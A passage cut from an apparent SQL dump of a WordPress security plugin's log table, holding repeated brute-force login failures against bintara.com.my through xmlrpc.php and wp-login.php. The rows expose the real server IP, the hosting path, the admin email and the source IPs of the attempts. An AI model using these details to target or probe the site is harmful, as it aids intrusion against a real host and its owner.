10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQnnR90bn5mtr-PXqqzXAAAAFE\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"80.248.225.58\";s:11:\"REMOTE_PORT\";s:5:\"57254\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQnnR90bn5mtr-PXqqzXAAAAFE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566844829.572\";s:12:\"REQUEST_TIME\";s:10:\"1566844829\";}}','notice','2019-08-26 18:40:31','2019-08-26 18:40:29',18311344,19501368,'http://bintara.com.my/blog/xmlrpc.php',1,0,'80.248.225.58'),(23183,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQnoIir4pgxiIHnHK4nvQAAAcI\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"107.180.122.10\";s:11:\"REMOTE_PORT\";s:5:\"52731\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQnoIir4pgxiIHnHK4nvQAAAcI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566844832.3481\";s:12:\"REQUEST_TIME\";s:10:\"1566844832\";}}','notice','2019-08-26 18:40:34','2019-08-26 18:40:32',18301072,19503440,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'107.180.122.10'),(23184,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQnpWXkG1atThADMYGM8AAAAMU\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"173.248.156.210\";s:11:\"REMOTE_PORT\";s:5:\"49368\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQnpWXkG1atThADMYGM8AAAAMU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566844837.1838\";s:12:\"REQUEST_TIME\";s:10:\"1566844837\";}}','notice','2019-08-26 18:40:39','2019-08-26 18:40:37',18300648,19500336,'http://bintara.com.my/blog/xmlrpc.php',1,0,'173.248.156.210'),(23185,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"185.72.5.59\";s:11:\"REMOTE_PORT\";s:5:\"52484\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQn5BTEVi0fEJEHuDZDmgAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566844900.7379\";s:12:\"REQUEST_TIME\";s:10:\"1566844900\";}}','notice','2019-08-26 18:41:42','2019-08-26 18:41:41',17685864,19178192,'https://bintara.com.my/wp-login.php',1,0,'185.72.5.59'),(23186,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"356\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQoAYir4pgxiIHnHK4nzQAAAcE\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"89.46.6.229\";s:11:\"REMOTE_PORT\";s:5:\"44530\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQoAYir4pgxiIHnHK4nzQAAAcE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566844929.2451\";s:12:\"REQUEST_TIME\";s:10:\"1566844929\";}}','notice','2019-08-26 18:42:11','2019-08-26 18:42:09',18303168,19505440,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'89.46.6.229'),(23187,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"338\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQoAhTEVi0fEJEHuDZDpgAAAAU\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:10:\"5.2.87.215\";s:11:\"REMOTE_PORT\";s:5:\"49994\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQoAhTEVi0fEJEHuDZDpgAAAAU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566844930.1599\";s:12:\"REQUEST_TIME\";s:10:\"1566844930\";}}','notice','2019-08-26 18:42:14','2019-08-26 18:42:10',18301512,19501616,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'5.2.87.215'),(23188,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"340\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQoCBTEVi0fEJEHuDZDqgAAABQ\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.68.251.199\";s:11:\"REMOTE_PORT\";s:5:\"36286\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQoCBTEVi0fEJEHuDZDqgAAABQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566844936.6754\";s:12:\"REQUEST_TIME\";s:10:\"1566844936\";}}','notice','2019-08-26 18:42:19','2019-08-26 18:42:17',18304704,19589008,'http://bintara.com.my/blog/xmlrpc.php',1,0,'103.68.251.199'),(23189,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQophTEVi0fEJEHuDZD-wAAAAY\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"172.110.6.177\";s:11:\"REMOTE_PORT\";s:5:\"43474\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQophTEVi0fEJEHuDZD-wAAAAY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845094.8312\";s:12:\"REQUEST_TIME\";s:10:\"1566845094\";}}','notice','2019-08-26 18:44:57','2019-08-26 18:44:55',18306752,19592008,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'172.110.6.177'),(23190,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your 